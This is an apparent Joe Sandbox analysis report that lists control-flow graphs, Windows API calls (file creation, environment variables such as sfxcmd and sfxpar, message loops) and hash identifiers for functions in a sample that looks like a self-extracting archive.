call 18c417 1677->1684 1685 18a476-18a47c 1677->1685 1689 18a47e 1685->1689 1690 18a480-18a486 1685->1690 1691 18989d-1898ff call 1714a3 call 17a251 call 171770 call 1714a3 call 17a251 call 171770 1686->1691 1692 189961-189967 1686->1692 1689->1690 1696 18a488-18a491 call 175e94 1690->1696 1697 18a493-18a4c5 call 175628 call 171170 call 1757f6 call 171770 * 2 1690->1697 1771 189901-189903 1691->1771 1772 189904-189932 call 1714a3 call 17a251 call 171770 1691->1772 1698 189969-189984 1692->1698 1699 1899ae-1899c8 1692->1699 1700 188d4a 1694->1700 1701 188d50-188d64 call 175712 1694->1701 1696->1684 1696->1697 1697->1684 1708 1899a5-1899ad call 18c3b6 1698->1708 1709 189986-18999f call 1716b3 1698->1709 1704 1899ca-1899e5 1699->1704 1705 189a0f-189a15 1699->1705 1700->1701 1728 188de5-188e4b call 179c69 1701->1728 1729 188d66-188dbe call 171fd0 call 1757f6 call 171770 call 179adc 1701->1729 1714 189a06-189a0e call 18c3b6 1704->1714 1715 1899e7-189a00 call 1716b3 1704->1715 1705->1623 1708->1699 1709->1708 1714->1705 1715->1714 1743 188e4d-188e78 call 186674 call 179c69 1728->1743 1744 188e92-188ec5 call 1714a3 call 17a251 call 171770 1728->1744 1729->1639 1769 188dc4-188dd7 1729->1769 1765 188e7a-188e8c 1743->1765 1775 188ed2-188ed5 1744->1775 1776 188ec7-188ecb 1744->1776 1765->1744 1773 188dd9 1769->1773 1774 188ddf-188de1 1769->1774 1771->1772 1785 189934-189936 1772->1785 1786 189937-18994b call 179c69 1772->1786 1773->1774 1774->1728 1775->1655 1779 188edb 1775->1779 1776->1744 1778 188ecd 1776->1778 1778->1655 1779->1652 1785->1786 1786->1686
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: HIDE$MAX$MIN
                        • API String ID: 176396367-2426493550
                        • Opcode ID: d7bbe4021062d3085dd963caaa94e7b4e5b930e2af5c59facd7a500c71aef05d
                        • Instruction ID: 7ee2313fdd406d801c40b31c0990d7ec26834c3273ef64ff1a077622fb99ddc5
                        • Opcode Fuzzy Hash: d7bbe4021062d3085dd963caaa94e7b4e5b930e2af5c59facd7a500c71aef05d
                        • Instruction Fuzzy Hash: 10B18E31D00258DACF25EFA8CC85AEDB7B9BF55314F58419AE409B7241DB709B89CFA0

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1789 18ae2d-18ae42 call 18c468 1792 18ae44 1789->1792 1793 18ae46-18ae76 SetEnvironmentVariableW call 179b75 1789->1793 1792->1793 1795 18ae7b-18ae7d 1793->1795 1796 18aebd-18aec3 1795->1796 1797 18ae7f 1795->1797 1799 18aef8-18aefd call 18c417 1796->1799 1800 18aec5-18aeda 1796->1800 1798 18ae82-18ae88 1797->1798 1801 18ae8a 1798->1801 1802 18ae8c-18ae98 call 179df6 1798->1802 1804 18aedc-18aeec call 1716b3 1800->1804 1805 18aeef-18aef7 call 18c3b6 1800->1805 1801->1802 1813 18ae9a-18aea1 1802->1813 1814 18aea3-18aea7 1802->1814 1804->1805 1805->1799 1813->1798 1815 18aea9 1814->1815 1816 18aeab-18aeb7 SetEnvironmentVariableW 1814->1816 1815->1816 1816->1796
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0018AE34
                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?,?,?,?,?,?,00000028), ref: 0018AE4C
                        • SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 0018AEB7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: EnvironmentVariable$H_prolog3_
                        • String ID: sfxcmd$sfxpar
                        • API String ID: 3605364767-3493335439
                        • Opcode ID: c3767aa859c6ffff1d7f3f52575fa1c135aa0cdead01e14b0bdfdef67aaf0ef9
                        • Instruction ID: 7097ae4ad0a47e07ab794feb8660697a5f1f0644396e882aa4ec86b7ea162071
                        • Opcode Fuzzy Hash: c3767aa859c6ffff1d7f3f52575fa1c135aa0cdead01e14b0bdfdef67aaf0ef9
                        • Instruction Fuzzy Hash: 0A211670D10218AFDB15EFA8D9959EDB7B9EF49301B50482AF841F7240DB30AA85CFA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1817 186357-186380 GetClassNameW 1818 1863a8-1863aa 1817->1818 1819 186382-186397 call 17bf3c 1817->1819 1821 1863ac-1863ae 1818->1821 1822 1863b5-1863c1 call 18c3c4 1818->1822 1825 186399-1863a5 FindWindowExW 1819->1825 1826 1863a7 1819->1826 1821->1822 1825->1826 1826->1818
                        APIs
                        • GetClassNameW.USER32(?,?,00000050), ref: 00186378
                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 001863AF
                          • Part of subcall function 0017BF3C: CompareStringW.KERNEL32(00000400,00001001,B19080A7,000000FF,?,000000FF,001753ED,0000002E,-00000002,00000000,?,00000000,?,00000008,?,?), ref: 0017BF52
                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0018639F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                        • String ID: @Ut$EDIT
                        • API String ID: 4243998846-2065656831
                        • Opcode ID: 791c34cc78cd7f31c65f962e60c08fe5cdbb9d5341ff747ea89ae65b3d7ebc90
                        • Instruction ID: 5c0ab33d41ae6914d5856d14c2247a7c029a209e02d9cbecf5d146b06141aa35
                        • Opcode Fuzzy Hash: 791c34cc78cd7f31c65f962e60c08fe5cdbb9d5341ff747ea89ae65b3d7ebc90
                        • Instruction Fuzzy Hash: 36F06835A01718ABDB20AB659D05F9F7BBCAF46B11F004055FE04E7180D770DE458BE5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 0017A473: __EH_prolog3_GS.LIBCMT ref: 0017A47A
                          • Part of subcall function 0017A473: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0017A4AF
                        • OleInitialize.OLE32(00000000), ref: 00186576
                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001865AD
                        • SHGetMalloc.SHELL32(001CAA78), ref: 001865B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                        • String ID: riched20.dll$3So
                        • API String ID: 2446841611-3464455743
                        • Opcode ID: 1007b035465c0a91accd599ac7018a825fe4c56780cf9054e0b8cdbf437e635b
                        • Instruction ID: 147b0ec3ada4b1658b134c5985d12d837cf645a0dad6e85c45f846ee702b10e7
                        • Opcode Fuzzy Hash: 1007b035465c0a91accd599ac7018a825fe4c56780cf9054e0b8cdbf437e635b
                        • Instruction Fuzzy Hash: BBF049B5D00209ABCB10AFAAD849AAFFFFCEF94704F00401AE815E2201C7B49645CFA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1832 173650-173699 1833 1736a4 1832->1833 1834 17369b-17369e 1832->1834 1836 1736a6-1736b6 1833->1836 1834->1833 1835 1736a0-1736a2 1834->1835 1835->1836 1837 1736be-1736c8 1836->1837 1838 1736b8 1836->1838 1839 1736cd-1736fa 1837->1839 1840 1736ca 1837->1840 1838->1837 1841 173702-173708 1839->1841 1842 1736fc 1839->1842 1840->1839 1843 17370c-173724 CreateFileW 1841->1843 1844 17370a 1841->1844 1842->1841 1845 1737e6 1843->1845 1846 17372a-17375a GetLastError call 1760a8 1843->1846 1844->1843 1848 1737e9-1737ec 1845->1848 1852 17378e 1846->1852 1853 17375c-173763 1846->1853 1850 1737ee-1737f1 1848->1850 1851 1737fa-1737fe 1848->1851 1850->1851 1854 1737f3 1850->1854 1855 173800-173803 1851->1855 1856 17381f-173830 1851->1856 1860 173791-17379b 1852->1860 1857 173765 1853->1857 1858 173768-173788 CreateFileW GetLastError 1853->1858 1854->1851 1855->1856 1859 173805-17381c SetFileTime 1855->1859 1861 173844-17386a call 171770 call 18c3c4 1856->1861 1862 173832-173840 call 1721d7 1856->1862 1857->1858 1858->1852 1863 17378a-17378c 1858->1863 1859->1856 1864 1737d0-1737e4 1860->1864 1865 17379d-1737b2 1860->1865 1862->1861 1863->1860 1864->1848 1868 1737c7-1737cf call 18c3b6 1865->1868 1869 1737b4-1737c4 call 1716b3 1865->1869 1868->1864 1869->1868
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,?,00000000,00000003,08000000,00000000,B19080A7,?,00000000,?,?,?,00000000,0019FCB8,000000FF), ref: 00173718
                        • GetLastError.KERNEL32(?,?,00000000,0019FCB8,000000FF), ref: 0017372A
                        • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,?,?,00000000,0019FCB8,000000FF), ref: 00173776
                        • GetLastError.KERNEL32(?,?,00000000,0019FCB8,000000FF), ref: 0017377F
                        • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,0019FCB8,000000FF), ref: 00173816
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: File$CreateErrorLast$Time
                        • String ID:
                        • API String ID: 1999340476-0
                        • Opcode ID: f22197c3c3b2c84758aa4a2e59adf212775ac0bc17fb1f8736d9f4c6ce6b11ba
                        • Instruction ID: 249b0863a189e5ca36a629d2bd6aac96994253b8bb47e2441e924bb3e542fab2
                        • Opcode Fuzzy Hash: f22197c3c3b2c84758aa4a2e59adf212775ac0bc17fb1f8736d9f4c6ce6b11ba
                        • Instruction Fuzzy Hash: 106191B1904249AFDB18CF68CD45BEE7BB4FF09314F208219F92997391D7749A44CB94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1878 1875d8-1875f1 PeekMessageW 1879 18762c-18762e 1878->1879 1880 1875f3-187607 GetMessageW 1878->1880 1881 187618-187626 TranslateMessage DispatchMessageW 1880->1881 1882 187609-187616 IsDialogMessageW 1880->1882 1881->1879 1882->1879 1882->1881
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001875E9
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001875FA
                        • IsDialogMessageW.USER32(0001048C,?), ref: 0018760E
                        • TranslateMessage.USER32(?), ref: 0018761C
                        • DispatchMessageW.USER32(?), ref: 00187626
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Message$DialogDispatchPeekTranslate
                        • String ID:
                        • API String ID: 1266772231-0
                        • Opcode ID: 4f413c7c72182f6768c3fc0ed33a14aa9bf7445c91c2010c7d0214e11ff00761
                        • Instruction ID: 84b829097444aa820d729d8b8d83b19163bd80af09e70b9726fdf0515b70bd7b
                        • Opcode Fuzzy Hash: 4f413c7c72182f6768c3fc0ed33a14aa9bf7445c91c2010c7d0214e11ff00761
                        • Instruction Fuzzy Hash: 1FF0B7B690122AABDB20ABF6AC4CDEB7F7CEF052947504414F509D3450E768D945CBF1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1883 1817b1-1817dc 1884 181882-1818a1 call 18cb00 1883->1884 1885 1817e2 1883->1885 1891 18197c-18198c 1884->1891 1892 1818a7-1818dc call 173cf0 1884->1892 1887 1817ec-181833 call 17f9d1 1885->1887 1888 1817e4-1817e6 1885->1888 1904 181839-18183b 1887->1904 1905 181aa6 1887->1905 1888->1884 1888->1887 1893 18198e-1819c4 call 18c510 1891->1893 1917 1818de-18190f call 17f9d1 1892->1917 1901 1819ca-1819cc 1893->1901 1902 181aae-181ab4 1893->1902 1901->1905 1906 1819d2-181a35 call 17f9d1 1901->1906 1903 181aba-181ae4 call 17f5b7 1902->1903 1915 181aea-181b8f call 17f464 * 4 call 17f43f * 2 call 17f464 call 181515 1903->1915 1916 181ae6-181ae8 1903->1916 1904->1905 1909 181841-18184c 1904->1909 1907 181aa8-181aa9 1905->1907 1935 181aa2-181aa4 1906->1935 1936 181a37-181a39 1906->1936 1912 181bb5-181bc7 call 18c3c4 1907->1912 1914 181859-181861 1909->1914 1919 18184e-181856 call 17ec47 1914->1919 1920 181863 1914->1920 1915->1912 1972 181b91-181baf 1915->1972 1916->1907 1917->1905 1934 181915-18191b 1917->1934 1931 181868-18187d 1919->1931 1932 181858 1919->1932 1920->1905 1931->1903 1932->1914 1934->1905 1938 181921-18192c 1934->1938 1935->1902 1935->1905 1936->1935 1939 181a3b-181a47 1936->1939 1941 181939-181941 1938->1941 1944 181a54-181a5c 1939->1944 1942 18192e-181936 call 17ec47 1941->1942 1943 181943 1941->1943 1956 181938 1942->1956 1957 181945-181961 1942->1957 1948 181965-18197a call 193da0 1943->1948 1949 181a49-181a51 call 17ec47 1944->1949 1950 181a5e 1944->1950 1948->1893 1964 181a60-181a7b 1949->1964 1965 181a53 1949->1965 1955 181a7c-181a9c call 193da0 1950->1955 1955->1901 1955->1935 1956->1941 1957->1948 1964->1955 1965->1944 1972->1912
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: _strncpy$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 2527496121-0
                        • Opcode ID: 715316fcdd5076330cf3ac0b77cb23ac6e3556dba4cf94b4cbf38732026775e5
                        • Instruction ID: 0d9ded64e1a1b7096cdee6e8b533d7adb71835f61e8472d25f8550513937625b
                        • Opcode Fuzzy Hash: 715316fcdd5076330cf3ac0b77cb23ac6e3556dba4cf94b4cbf38732026775e5
                        • Instruction Fuzzy Hash: AAB1B2B69043149FC70AEF68EC85E2A7BF9FF98308F44452EE54593661E730D9858F82

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1974 173d88-173da1 call 18c468 1977 173da3-173da5 1974->1977 1978 173daa-173db4 1974->1978 1979 173ee6-173eeb call 18c417 1977->1979 1980 173db6-173dc3 GetStdHandle 1978->1980 1981 173dc8 1978->1981 1982 173eaf-173eb2 1980->1982 1983 173dcb-173dd8 1981->1983 1982->1983 1986 173e1f-173e34 WriteFile 1983->1986 1987 173dda-173dde 1983->1987 1988 173e37-173e39 1986->1988 1989 173de0-173deb 1987->1989 1990 173e3f-173e43 1987->1990 1988->1990 1993 173edf-173ee2 1988->1993 1991 173def-173e0e WriteFile 1989->1991 1992 173ded 1989->1992 1990->1993 1994 173e49-173e4d 1990->1994 1991->1988 1995 173e10-173e1b 1991->1995 1992->1991 1993->1979 1994->1993 1996 173e53-173e65 call 172d73 1994->1996 1995->1989 1997 173e1d 1995->1997 2000 173eb7-173eda call 1714a3 call 173183 call 171770 1996->2000 2001 173e67-173e70 1996->2001 1997->1988 2000->1993 2001->1983 2003 173e76-173e7a 2001->2003 2003->1983 2005 173e80-173eac 2003->2005 2005->1982
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00173D8F
                        • GetStdHandle.KERNEL32(000000F5,0000002C,0017F3B8,?,?,?,?,?,0017FBCE,001BA6BC,?,00180570,00010000), ref: 00173DB8
                        • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 00173DFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FileH_prolog3_HandleWrite
                        • String ID:
                        • API String ID: 2898186245-0
                        • Opcode ID: 1b254677023a1ac4260698582d71acea59cdfdef231fb067bc183025bde696a3
                        • Instruction ID: f6c4be35e0748a947eb02538f1491ba2bf14f9e1e9ff4df9f1cffe4381afa7d1
                        • Opcode Fuzzy Hash: 1b254677023a1ac4260698582d71acea59cdfdef231fb067bc183025bde696a3
                        • Instruction Fuzzy Hash: 08419E30A05244AFDF14DFA8D884BADBB76AF95700F048019F819AB281CB319E85DBA1
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00174747
                        • CreateDirectoryW.KERNELBASE(?,00000000,?,00000024,001742E9,?,00000001,00000000,?,?,?,?,?,00000024), ref: 00174770
                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000024,001742E9,?,00000001,00000000,?,?), ref: 001747C6
                        • GetLastError.KERNEL32(?,?,00000024,001742E9,?,00000001,00000000,?,?,?,?,?,00000024), ref: 00174834
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CreateDirectory$ErrorH_prolog3_Last
                        • String ID:
                        • API String ID: 3709856315-0
                        • Opcode ID: 7d6dbca0a63d57b6ba5b7208cac0991d8a14ae4a7494360eab0efdb15c04a286
                        • Instruction ID: 27608c836e138e4c1ac0dc1f03a7670dd000db7dcd2a96ca4b7fb9039f24710f
                        • Opcode Fuzzy Hash: 7d6dbca0a63d57b6ba5b7208cac0991d8a14ae4a7494360eab0efdb15c04a286
                        • Instruction Fuzzy Hash: 7331B471901258ABDF14EFE8C988AEEBBF8EF59310F14841AF505E7250D7349A80CB75
                        APIs
                        • GetStdHandle.KERNEL32(000000F6), ref: 00173519
                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00173531
                        • GetLastError.KERNEL32 ref: 00173563
                        • GetLastError.KERNEL32 ref: 00173582
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorLast$FileHandleRead
                        • String ID:
                        • API String ID: 2244327787-0
                        • Opcode ID: a6358ab49fd9d8b04efa0cc85bbc372882029e14f88e24d6c5fd6e255075c480
                        • Instruction ID: eb83d309f0e01c260e4e99c2b70a2090eb11fb365566691e348742b2a8d29b66
                        • Opcode Fuzzy Hash: a6358ab49fd9d8b04efa0cc85bbc372882029e14f88e24d6c5fd6e255075c480
                        • Instruction Fuzzy Hash: 79117C71900204EBDF249B24C90896D37B9EB06361F20CA29F93A85190D771DF80EB52
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00173391
                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,?,?,?,?,00000024), ref: 00173405
                        • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,?,?,?,?,00000024), ref: 00173455
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: CreateFile$H_prolog3_
                        • String ID:
                        • API String ID: 1771569470-0
                        • Opcode ID: 28c7810b50d9a97ca76c8c815898b57c341236c4a2f0e7dc01a17e6b5bee66ba
                        • Instruction ID: 905275bef51458c489885108f2fa7a3000fb0fc667024ca436e6b9451d9ece32
                        • Opcode Fuzzy Hash: 28c7810b50d9a97ca76c8c815898b57c341236c4a2f0e7dc01a17e6b5bee66ba
                        • Instruction Fuzzy Hash: D9416571D102089FDF28DFA4D889BEEB7B4FB08320F10861EE465E6291D7749A44DB74
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0017A47A
                        • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0017A4AF
                        • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 0017A521
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: DirectoryH_prolog3_LibraryLoadSystem
                        • String ID:
                        • API String ID: 1552931673-0
                        • Opcode ID: 217ceea9cbbff08c5ed99c0672e1afdbc72c8132301daa6541e3aba6243dc14d
                        • Instruction ID: a6b18ea652949f5e9ac194266008fcdca7b62c849f8e544771ffb5a9441b1029
                        • Opcode Fuzzy Hash: 217ceea9cbbff08c5ed99c0672e1afdbc72c8132301daa6541e3aba6243dc14d
                        • Instruction Fuzzy Hash: F0314F72D00208EBDB04EFE4C999BEEBBB8AF58314F10811DE509B7281DB745A45CBA1
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 00174A36
                        • SetFileAttributesW.KERNELBASE(?,00000000,00000024,00174830,?,?,?,?,?,?,00000024,001742E9,?,00000001,00000000,?), ref: 00174A4C
                        • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000024), ref: 00174A8F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AttributesFile$H_prolog3_
                        • String ID:
                        • API String ID: 2559025557-0
                        • Opcode ID: c262bebe98ec3f434561e8e2d07ebc39389de979b19e9ea6cc781b363adfaafa
